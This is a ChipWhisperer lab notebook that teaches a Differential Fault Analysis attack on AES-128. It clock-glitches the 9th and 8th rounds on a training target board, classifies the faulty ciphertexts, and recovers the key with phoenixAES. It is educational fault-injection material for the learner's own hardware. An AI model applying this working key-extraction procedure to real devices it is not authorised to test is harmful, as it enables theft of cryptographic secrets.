# Part 1, Topic 3, Lab B: DFA Attack on AES

This work, "Part 1, Topic 3, Lab B: DFA Attack on AES", is a derivative of "Recovering an AES key by Differential Fault Analysis attack" by Philippe Teuwen ([\@doegox](https://twitter.com/doegox)), used under CC BY SA. "Part 1, Topic 1, Lab B: DFA Attack on AES" is licensed under CC BY SA by NewAE Technology Inc. 

The original tutorial with minor modifications is available in the the `archive` folder of this repository. The original description, including attribution and changes is shown in the following block:

# Tutorial: Recovering an AES key by Differential Fault Analysis attack

Supported setups:

SCOPES:

* OPENADC

PLATFORMS:

* CWLITEARM
* CWLITEXMEGA

This tutorial will introduce you to the Differential Fault Analysis (DFA) attack. It will show you how to configure the  target to perform AES encryptions, how to glitch the encryption operations and introduce errors in the computed ciphertext and finally how to process these glitched ciphertexts to extract the AES key. This can be used as how-to for attacking other targets as well.

Original author: Philippe Teuwen ([\@doegox](https://twitter.com/doegox))

License: CC-BY-SA  

Improvements are welcome!



> **Thanks to Philippe Teuwen for contributing this tutorial, he was the winner of the ChipWhisperer 2018 Contest with this submission!**

This notebook has been updated to reflect changes with the ChipWhisperer API, work with the ChipWhisperer-Lite ARM, and with the above congratulatory message.

### On giants' shoulders
This tutorial is the first to deal with DFA, nevertheless it was not designed from scratch.
It relies on multiple sources we strongly encourage your to read as well for a better understanding of the details.

* The `simpleserial-aes` target firmware, which contains the software AES implementation used in other side-channel analysis tutorials such as [Using CW Analyzer for CPA Attack](PA_CPA_1-Using_CW-Analyzer_for_CPA_Attack.ipynb). This is the implementation we will attack.
* The glitching tutorials:
  * [Introduction to Glitch Attacks](Fault_1-Introduction_to_Clock_Glitch_Attacks.ipynb), useful to understand the hardware implementation of the glitching module
  * [Tutorial CW305-3 Clock Glitching (wiki)](https://wiki.newae.com/Tutorial_CW305-3_Clock_Glitching) which also presented briefly the principles of glitching AES, but without exploiting the faults
* The DFA attack itself: there is no DFA cryptanalysis code in the Chipwhisperer but we'll re-use a Python library the author of this tutorial wrote for attacking white-box implementations. It's called `phoenixAES` and it is available on [Github](https://github.com/SideChannelMarvels/JeanGrey) and on PyPI.

**SUMMARY:** *We saw in part A of this lab that we can insert faults into the 9th round of AES and, with enough faults and constant plaintext, we can recover the key. In this lab, we'll be trying this attack on a real target. Instead of performing the work manually, we'll be using PhoenixAES, which was written by Philippe Teuwen, author of the tutorial and blog post on which this lab is based. Later, we'll see how this attack can also be used on the 8th round instead.*

**LEARNING OUTCOMES**
* Identifying the 9th round of AES from a power trace
* Checking glitched ciphertexts for single byte fault criteria
* Faulting the 8th round of AES

In [ ]:
SCOPETYPE = "OPENADC"
PLATFORM = "CWLITEARM"
CRYPTO_TARGET = "TINYAES128C"

## Prerequisites

### Brief introduction to Differential Fault Analysis
We'll only describe the general principle and the operational constraints.

The principle is to repeat the same AES operation over and over and to glitch its intermediate operations to get an output cryptographically incorrect. There are many DFA algorithms which, depending on the nature of the fault (single bit?, single byte?, how many faulted outputs can we collect?...), are able to recover the last round key of the AES with various computations that may be quite intensive.

This tutorial covers the recovering of the key of a simple AES-128 encryption.

We'll use a quite simple DFA published initially by Dusart, Letourneux and Vivolo in 2002 which has nice properties. For a mathematical deep-dive of the DFA we're using in this tutorial, you can read [Differential Fault Analysis on White-box AES Implementations](https://blog.quarkslab.com/differential-fault-analysis-on-white-box-aes-implementations.html) as we will use the exact same DFA library. Moreover, the blog post explains how to tackle DFA against AES decryption and how to attack more than one round, which is required to attack AES-192 or AES-256.

AES-128 is made of 10 rounds, the last one is missing the *MixColumn* operation, the only operation which brings diffusion, i.e. it's an operation which makes a single byte of one round state affecting multiple bytes in the next round, 4 bytes to be exact.

![aes_operations.png](img/aes_operations.png)

(source: http://www.iis.ee.ethz.ch/~kgf/acacia/fig/aes.png)

So, if we inject a fault which affects a single byte between the last two *MixColumn* operations, it will propagate and 4 of the 16 output bytes will be wrong. We don't need to know precisely where we inject our faults, we can simply observe the output and look for a 4-byte fault with one of the 4 possible patterns. The attack is *differential* because we observe the difference between the correct output and the faulty outputs.
We'll save you the maths but with 2 such faults on the same column, there is a high probability to recover a quarter of the round key, so with 4\*2 faults we can recover the entire round key. And because the AES keyschedule is invertible, we can compute it backwards and recover the first round key, which is by definition equal to the AES-128 key.

So, our operational constraints are quite simple: be able to run several times the same AES encryption, with the same key (doh!) and the same plaintext input and be able to collect the ciphertexts. Note that technically we don't need to know the value of the plaintext, we only need it to be constant.

### Installing dependencies

Firstly, let's install `phoenixAES` in the current kernel environment:

In [ ]:
import sys
!{sys.executable} -m pip install phoenixAES

## Target

### Which target?

Let's recap. This tutorial is specifically focusing on:
* AES-128 encryption
* the Chipwhisperer Lite ARM or XMEGA target
* AVR Crypto Lib or TinyAES128C
* clock glitching

Other targets and AES implementations should be equally working as well as power glitching. Obviously the glitching parameters will have to be adapted to the corresponding target, which is often not that straightforward.  

Even if you run this tutorial on the same Chipwhisperer Lite target hardware, you might have to alter slightly the glitching parameters to be able to get working glitches. Glitching is so sensitive that running twice the exact same attack hardly produce the exact same results.

### Building the target firmware

If you have the `avr-gcc` toolchain installed, you should be able to build the `simpleserial-aes-CW303` firmware:

In [ ]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET"
cd ../../../hardware/victims/firmware/simpleserial-aes
make PLATFORM=$1 CRYPTO_TARGET=$2

## Attack setup

### CW-lite connection and target flashing

Connect to the Chipwhisperer:

In [ ]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

Flash the target:

In [ ]:
fw_path = "../../../hardware/victims/firmware/simpleserial-aes/simpleserial-aes-{}.hex".format(PLATFORM)
cw.program_target(scope, prog, fw_path)

In [ ]:
if PLATFORM == "CWLITEXMEGA":
    def reboot_flush():            
        scope.io.pdic = False
        time.sleep(0.1)
        scope.io.pdic = "high_z"
        time.sleep(0.1)
        #Flush garbage too
        target.flush()
else:
    def reboot_flush():            
        scope.io.nrst = False
        time.sleep(0.05)
        scope.io.nrst = "high_z"
        time.sleep(0.05)
        #Flush garbage too
        target.flush()

### First execution

For the DFA attack, we need a constant plaintext (and constant key of course).
We could just use two bytearrays but let's use the CW API to demonstrate its usage.


In [ ]:
ktp = cw.ktp.Basic()
ktp.fixed_text = True
ktp.fixed_key = True
key, text = ktp.next()

Assuming we want to record traces, let's capture the entire AES.  
It's useful to see which round(s) we'll glitch by tuning `scope.glitch.ext_offset` later.

In [ ]:
scope.clock.adc_src = "clkgen_x1"
if PLATFORM == "CWLITEXMEGA" or PLATFORM == "CW303":
    scope.adc.samples = 20000
elif PLATFORM == "CWLITEARM" or PLATFORM == "CW308_STM32F3":
    scope.adc.samples = 8000

Let's test our setup with a first execution, without fault.
It will give us the golden reference output.

In [ ]:
# make sure glitches are disabled (in case cells are re-run)
scope.io.hs2 = "clkgen"

trace = cw.capture_trace(scope, target, text, key)
goldciph = trace.textout
print("Plaintext: {}".format(text.hex()))
print("Key:       {}".format(key.hex()))
print("Ciphertext:{}".format(goldciph.hex()))

In [ ]:
reset_target(scope)

Just to be sure, let's check...

In [ ]:
from Crypto.Cipher import AES
aes = AES.new(bytes(key), AES.MODE_ECB)
goldciph2 = aes.encrypt(bytes(text))
print("Expected ciphertext:  {}".format(goldciph2.hex()))

Let's draw the full AES execution

In [ ]:
import holoviews as hv
from holoviews import opts
hv.extension('bokeh')
curve = hv.Curve(trace.wave).opts(width=600, height=600)

# add boxes around last rounds

if PLATFORM == "CWLITEXMEGA" or PLATFORM == "CW303":
    line = hv.Path([(11600, -0.25), (11600, 0.25), (13200, 0.25), (13200, -0.25), (11600, -0.25)], label='8th round').opts(color="red", show_legend=True) * \
            hv.Path([(13250, -0.25), (13250, 0.25), (14850, 0.25), (14850, -0.25), (13250, -0.25)], label='9th round').opts(color="green", show_legend=True) * \
            hv.Path([(14900, -0.25), (14900, 0.25), (16000, 0.25), (16000, -0.25), (14900, -0.25)], label='10th round').opts(color="yellow", show_legend=True)
elif PLATFORM == "CWLITEARM" or PLATFORM == "CW308_STM32F3":
    line = hv.Path([(5050, -0.1), (5050, 0.2), (5740, 0.2), (5740, -0.1), (5050, -0.1)], label='8th round').opts(color="red", show_legend=True) * \
            hv.Path([(5740, -0.1), (5740, 0.2), (6425, 0.2), (6425, -0.1), (5740, -0.1)], label='9th round').opts(color="green", show_legend=True) * \
            hv.Path([(6425, -0.1), (6425, 0.2), (6820, 0.2), (6820, -0.1), (6425, -0.1)], label='10th round').opts(color="yellow", show_legend=True)
    pass

#plt.show()
(curve * line).opts(opts.Path(line_width=3)).opts(width=600, height=600)

We see clearly the 10 AES-128 rounds, the 10th round being smaller than the others as there is no *MixColumn*.

### First glitches

To check the actual clock glitches with an oscilloscope, you can probe pin 6 of the CW 20 pin connector and run the following function to glitch all clock cycles during 2 seconds. Beware that the probe influences slightly the signal and it's enough to require a different tuning of the glitching parameters, so when you're attacking a target, do it all with or all without the oscilloscope but avoid messing up your setup!
In this tutorial, parameters were tuned without attached probe. Still, your board might require slightly different values.

In [ ]:
import time
if scope._is_husky:
    scope.glitch.enabled = True

# These width/offset numbers are for CW-Lite/Pro; for CW-Husky, convert as per Fault 1_1:
def test_glitches():
    if PLATFORM == "CWLITEXMEGA" or PLATFORM == "CW303":
        scope.io.hs2 = "glitch"
        scope.glitch.clk_src = 'clkgen'
        scope.glitch.width=3.5
        scope.glitch.offset=34
        scope.glitch.trigger_src='continuous'
    elif PLATFORM == "CWLITEARM" or PLATFORM == "CW308_STM32F3":
        scope.io.hs2 = "glitch"
        scope.glitch.clk_src = "clkgen"
        scope.glitch.width = -10.15625
        scope.glitch.offset = -39.84
        scope.glitch.trigger_src='continuous'

def stop_test_glitches():
    scope.glitch.trigger_src='ext_single'

test_glitches()
time.sleep(2)
stop_test_glitches()

Here is an example of five glitched clock cycles as seen with an oscilloscope:

![clock_glitches.png](img/clock_glitches.png)


See how the actual width and offset values are rounded to the internal step values.

In [ ]:
print(scope.glitch)

Let's see the effect of clock glitches on the AES execution.

In [ ]:
# Initial glitch parameters
# These width/offset numbers are for CW-Lite/Pro; for CW-Husky, convert as per Fault 1_1:
if PLATFORM == "CWLITEXMEGA" or PLATFORM == "CW303":
    scope.io.hs2 = "glitch"
    scope.glitch.clk_src = 'clkgen'
    scope.glitch.width=3.5
    scope.glitch.offset=34
    scope.glitch.trigger_src='ext_single'
    scope.glitch.ext_offset = 13000
elif PLATFORM == "CWLITEARM" or PLATFORM == "CW308_STM32F3":
    scope.io.hs2 = "glitch"
    scope.glitch.clk_src = "clkgen"
    scope.glitch.width = -10.15625 + 1
    scope.glitch.offset = -39.84
    scope.glitch.ext_offset = 5400
    scope.glitch.repeat = 3
    scope.glitch.trigger_src='ext_single'

# reset target
reset_target(scope)
time.sleep(0.1)

trace = cw.capture_trace(scope, target, text, key)

In [ ]:
curve = hv.Curve(trace.wave)
curve *= hv.Path([(scope.glitch.ext_offset, 0.25), (scope.glitch.ext_offset, -0.3)]).opts(color="red")
curve.opts(width=600, height=600)

You should see a glitch in the power trace (blue) when the clock was glitched (red dotted line).  
As said earlier, glitch parameters may have to be adapted to your specific hardware.  Our experience is that a good `scope.glitch.width` is one just a bit smaller than one producing a clearly visible glitch in the power trace. E.g. the trace above was created with `scope.glitch.width=6*MIN_STEP` and we'll use `scope.glitch.width=5*MIN_STEP` in our attack. If this is not precise enough, consider tuning `scope.glitch.width_fine` too.

### Campaign setup

We can use the GlitchController to do all the setup work for us here. We'll be categorizing our data into a lot of different groups, which will allow us to nicely visualize the data after our campaign is done:

In [ ]:
# get control over logging in order to be able to mask target execution errors,
# which can easily happen when glitching the target!
import logging
import chipwhisperer.common.results.glitch as glitch

# can 
gc = glitch.GlitchController(groups=["column0", "column1", "column2", "column3", "other", "reset", "normal"], parameters=["width", "offset", "ext_offset"])

The next cell defines the glitches campaign. Some of this probably looks pretty familliar from other glitching labs. We're doing a bit more work here to categorize the data. We're also making a table in `results` to display results later.

In [ ]:
#check if a single column is glitched
def check_column_glitch(glitched_ct, gold_ct, column):
    column_lookup = [[0, 13, 10, 7], [4, 1, 14, 11], [8, 5, 2, 15], [12, 9, 6, 3]] #shift rows
    for byte in column_lookup[column]:
        if glitched_ct[byte] == gold_ct[byte]:
            return False
    return True

outputs = []
results = []
obf = []
def campaign():
    # Initial glitch parameters
    global outputs
    global results
    global obf
    
    #reset results arrays
    outputs = []
    results = results = [['target output', 'width', 'offset', 'extoffset', 'column_fault']]
    obf = []
    
    #glitch setup
    scope.io.hs2 = "glitch"
    scope.glitch.clk_src = 'clkgen'
    scope.glitch.trigger_src = 'ext_single'
    key, text = ktp.next()
    
    #make sure correct key is loaded on target
    reboot_flush()
    target.simpleserial_write('k', key)
    target.simpleserial_wait_ack()
    
    for glitch_setting in gc.glitch_values():
        # set glitch settings
        scope.glitch.offset = glitch_setting[1]
        scope.glitch.width = glitch_setting[0]
        scope.glitch.ext_offset = glitch_setting[2]
        
        #do glitch
        target.flush()
        key, text = ktp.next()
        logging.getLogger().setLevel(logging.ERROR)
        
        scope.arm()        
        target.simpleserial_write('p', text)
        
        ret = scope.capture()
        if ret:
            print("timeout!")
            reboot_flush()
            target.simpleserial_write('k', key)
            target.simpleserial_wait_ack()
            continue
          
        #record output
        output = target.simpleserial_read_witherrors('r', 16, timeout=100, glitch_timeout=1) #don't care about glitchy text
        
        #handle invalid output
        if not output['valid']:
            gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
            reboot_flush()
            target.simpleserial_write('k', key)
            target.simpleserial_wait_ack()
            continue
        
        data = [bytes(output['payload']).hex(), scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset]
        
        #normal output
        if output['payload'] == goldciph:
            gc.add("normal", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
            data.append(None)
            results.append(data)
            continue
        
        outputs.append(output['payload'])
        
        #check for a glitch in each column of AES
        column_glitches = []
        for column in range(4):
            if check_column_glitch(output['payload'], goldciph, column):
                column_glitches.append(column)
           
        #We're looking for single column glitches here
        if len(column_glitches) == 1:
            gc.add("column{}".format(column_glitches[0]), (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
            obf.append(output['payload'])
            data.append(column_glitches[0])
        else:
            gc.add("other", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
            data.append(0xFF)
        
        #for display in ascii table
        results.append(data)        

## Attacking the 9th round

### R9: Collecting faulty outputs

In this attack, we'll try to glitch the 9th round MixColumns. You'll want to glitch between the output of the 8th round MixColumns and the input of the 9th round MixColumns. The following operations are between these two parts of AES:

1. 8th round AddRoundKey
1. 9th round SubBytes
1. 9th round ShiftRows

It may help to have the plot with the rounds marked off:

In [ ]:
import holoviews as hv
from holoviews import opts
hv.extension('bokeh')
curve = hv.Curve(trace.wave).opts(width=600, height=600)

# add boxes around last rounds
if PLATFORM == "CWLITEXMEGA" or PLATFORM == "CW303":
    line = hv.Path([(11600, -0.25), (11600, 0.25), (13200, 0.25), (13200, -0.25), (11600, -0.25)], label='8th round').opts(color="red", show_legend=True) * \
            hv.Path([(13250, -0.25), (13250, 0.25), (14850, 0.25), (14850, -0.25), (13250, -0.25)], label='9th round').opts(color="green", show_legend=True) * \
            hv.Path([(14900, -0.25), (14900, 0.25), (16000, 0.25), (16000, -0.25), (14900, -0.25)], label='10th round').opts(color="yellow", show_legend=True)
elif PLATFORM == "CWLITEARM" or PLATFORM == "CW308_STM32F3":
    line = hv.Path([(5050, -0.1), (5050, 0.2), (5740, 0.2), (5740, -0.1), (5050, -0.1)], label='8th round').opts(color="red", show_legend=True) * \
            hv.Path([(5740, -0.1), (5740, 0.2), (6425, 0.2), (6425, -0.1), (5740, -0.1)], label='9th round').opts(color="green", show_legend=True) * \
            hv.Path([(6425, -0.1), (6425, 0.2), (6820, 0.2), (6820, -0.1), (6425, -0.1)], label='10th round').opts(color="yellow", show_legend=True)
    pass

(curve * line).opts(opts.Path(line_width=3)).opts(width=600, height=600)

In [ ]:
# for scope.glitch.width:
# These width/offset numbers are for CW-Lite/Pro; for CW-Husky, convert as per Fault 1_1:
if PLATFORM == "CWLITEXMEGA" or PLATFORM == "CW303":
    width_range = Range(7*MIN_STEP, 8*MIN_STEP, MIN_STEP)
    offset_range = Range(0.4, 1.4, MIN_STEP)
    extoffset_range = Range(12800, 14100, 5)
    glitch_repeat = 5
elif PLATFORM == "CWLITEARM" or PLATFORM == "CW308_STM32F3":
    gc.set_range("width", 3, 5)
    gc.set_range("offset", -13, -13)
    gc.set_range("ext_offset", 5550, 5950)
    gc.set_global_step(0.4)
    scope.glitch.repeat = 1

The next cell runs the glitches campaign. Until you disconnect the Chipwhisperer, you can re-run the campaign and analyze its results several times.  
Even when the parameters are perfectly maintained, the glitch effects are never twice exactly the same and the results of our campaigns may vary quite a lot.  
Adjust these parameters if you don't get proper results. Roughly:
* Grab your glitch settings from Fault101
* Avoid increasing too much `scope.glitch.repeat` as you don't want to inject mutiple faults affecting several bytes at once
* Beware of the effect of an oscilloscope probe if you're monitoring the glitches

The goal is to collect as many *interesting* outputs as possible. An *interesting* output at this stage is simply a 16-byte output different from the reference output.

In [ ]:
gc.display_stats()
campaign()

Let's see the results:

In [ ]:
from terminaltables import AsciiTable
table = AsciiTable(results)
print(table.table)

Single we recorded which column each glitch was in, we can also plot where in `ext_offset` each successful glitch was. You can use either `width` or `offset` for the y-axis. In fact, try both!

In [ ]:
%matplotlib notebook
gc.results.plot_2d(plotdots={"column0":"+g", "column1":"pr", "column2":"bo", 
                             "column3":"sk", "normal":None, "other":None, "reset":None},
                   x_index=2, y_index=0)

We can also plot where we got resets and "other" results (glitches that didn't fault each byte in a single column). You can see there's way more "other" results and resets than successful glitches.

In [ ]:
%matplotlib notebook
gc.results.plot_2d(plotdots={"column0":"^g", "column1":"vg", "column2":"<g", 
                             "column3":">g", "normal":None, "other":"b.", "reset":"rx"},
                   x_index=2, y_index=0)

### R9: Cryptanalysis of the faulty outputs

We'll use `phoenixAES` to perform the DFA against the collected ciphertexts.

All it requires is the list of *interesting* outputs and the reference output.

In [ ]:
import phoenixAES
r10=phoenixAES.crack_bytes(outputs, goldciph, encrypt=True, verbose=2)

You can get a much cleaner output by only inserting single column faults:

In [ ]:
r10=phoenixAES.crack_bytes(obf, goldciph, encrypt=True, verbose=2)

In this first attack, we assume the fault was injected *between* the last two *MixColumn* operations and we look for ciphertexts only partially (25%) corrupted.  
We hope you managed to recover the full 10th round key. If not, you may try again [from here](#R9:-Collecting-faulty-outputs) :) If you got very few or no "interesting" ciphertexts, better to tune `width_range`.   
Once the last round key is recovered, you can revert the AES keyscheduling and reveal the actual AES key.

In [ ]:
r9_key=None
if r10 is not None:
    from chipwhisperer.analyzer.attacks.models.aes.key_schedule import key_schedule_rounds
    r9_key = key_schedule_rounds(bytearray.fromhex(r10), 10, 0)
    print("AES Key:")
    print(''.join("%02x" % x for x in r9_key))
else:
    print("Sorry, no key found, try another campain, maybe with different parameters...")

### R9: Plotting inner states differences

Once the AES key is known, we can display where the actual faults were injected, here plotting the first 10 outputs. 

In [ ]:
%run "../../Helper_Scripts/AES_differential_plotter.ipynb"
curve = None
if r9_key is not None:
    ad=AesDiff(intext=text, key=r9_key, encrypt=True)
    for c in outputs[:20]:
        ad.add_glitch(c)
    curve=ad.plot_diff_bits()
    if curve:
        curve
        curve *= hv.Path([(0, 8), (10, 8)], label='8 bits faulted').opts(color="red", show_legend=True)
    pass
curve.opts(width=600, height=600)

This graph displays the difference in bits between the goldciph and the faulty ciphertext at the output of each round. Of course the plot only makes sense from the lowest points of the curve to the right, there is no fault diffusion from the fault to the left.
We're more interested in the number of bytes which are faulted before the last *MixColumn*:

In [ ]:
curve=None
if r9_key is not None:
    curve=ad.plot_diff_bytes()
    curve
    curve *= hv.Path([(0, 1), (10, 1)], label='1 byte faulted').opts(color="red", show_legend=True)
curve.opts(width=600, height=600)

We also kept track of which outputs faulted a single column. We can plot all of these single column fault here:

In [ ]:
%run "../../Helper_Scripts/AES_differential_plotter.ipynb"
curve = None
if r9_key is not None:
    ad=AesDiff(intext=text, key=r9_key, encrypt=True)
    for c in obf[:]:
        ad.add_glitch(c)
    curve=ad.plot_diff_bits()
    if curve:
        curve *= hv.Path([(0, 8), (10, 8)], label='8 bits faulted').opts(color="red", show_legend=True)
curve.opts(width=600, height=600)

You should hopefully see mostly single byte faults here (you're looking for one byte to be wrong in the 8th round output). Otherwise multiple bytes in the column were faulted and we can't use that output to break the key! These faults are all on a single column, so they end up affecting 4 bytes of output.

In [ ]:
curve=None
if r9_key is not None:
    curve=ad.plot_diff_bytes()
    curve *= hv.Path([(0, 1), (10, 1)], label='1 byte faulted').opts(color="red", show_legend=True)
curve.opts(width=600, height=600)

We managed to break the key because indeed a number of executions was properly faulted on a single byte before the last *MixColumn*, cf the lowest curves at position 8.

## Attacking the 8th round

To reduce the number of required faults, we can inject glitches one round earlier.
If the faults are injected one *MixColumn* earlier, in the 8th round, the ciphertext will be completely corrupted.
But we can still apply the same cryptanalysis!
The trick is to convert one such fault into four faults on the 9th round.

### R8: Collecting faulty outputs

Let's change our parameters to attack one round earlier and launch our attack. We're still doing the single byte display, but this time you shouldn't see any single column faults. Instead, both good and bad faults are grouped into "other".

In [ ]:
# for scope.glitch.ext_offset:
if PLATFORM == "CWLITEXMEGA" or PLATFORM == "CW303":
    extoffset_range = Range(11800, 12400, 3)
elif PLATFORM == "CWLITEARM" or PLATFORM == "CW308_STM32F3":
    gc.set_range("ext_offset", 5050, 5250)
gc.display_stats()
campaign()

Let's see the results:

In [ ]:
from terminaltables import AsciiTable
table = AsciiTable(results)
print(table.table)

### R8: Cryptanalysis of the faulty outputs

In this second attack, we assume the fault was injected *before* the last two *MixColumn* operations.
First, we convert each 100% faulty output into four 25% faulty outputs and then we apply the same attack as before.

In [ ]:
outputs2=phoenixAES.convert_r8faults_bytes(outputs, goldciph, encrypt=True)
r10=phoenixAES.crack_bytes(outputs2, goldciph, encrypt=True, verbose=2)

We hope you managed to recover the full 10th round key. If not, you may try again [from here](#R8:-Collecting-faulty-outputs). 
Once the last round key is recovered, you can revert the AES keyscheduling and reveal the actual AES key.

In [ ]:
if r10 is not None:
    from chipwhisperer.analyzer.attacks.models.aes.key_schedule import key_schedule_rounds
    key = key_schedule_rounds(bytearray.fromhex(r10), 10, 0)
    print("AES Key:")
    print(''.join("%02x" % x for x in key))
else:
    print("Sorry, no key found, try another campain, maybe with different parameters...")

### R8: Plotting inner states differences

Let's plot the fault diffusion of the first 10 outputs.

In [ ]:
%run "../../Helper_Scripts/AES_differential_plotter.ipynb"
curve=None
if key is not None:
    ad=AesDiff(intext=text, key=key, encrypt=True)
    for c in outputs[:100]:
        ad.add_glitch(c)
    curve=ad.plot_diff_bits()
    if curve:
        curve
        curve *= hv.Path([(0, 8), (10, 8)], label='8 bits faulted').opts(color="red", show_legend=True)
curve.opts(width=600, height=600)

And grouped by faulty bytes. We now see that we get single byte faults one round earlier:

In [ ]:
curve = None
if key is not None:
    curve=ad.plot_diff_bytes()
    if curve:
        curve.opts(width=600, height=600)
curve

## The end

Once you're done, clean up the connection to the scope and target.  
**Warning**, once disconnected, you'll have to run the cells since the [CW-lite connection and target flashing](#CW-lite-connection-and-target-flashing) section to be connected again.

In [ ]:
scope.dis()
target.dis()

This tutorial is over.  
You might now try to attack other instances by yourself, e.g. recompile the target with `CRYPTO_TARGET = "TINYAES128C"` and try to break it!

## Tests

In [ ]:
assert key == [43, 126, 21, 22, 40, 174, 210, 166, 171, 247, 21, 136, 9, 207, 79, 60], "Failed to break r8"

In [ ]:
assert r9_key == [43, 126, 21, 22, 40, 174, 210, 166, 171, 247, 21, 136, 9, 207, 79, 60], "Failed to break r9"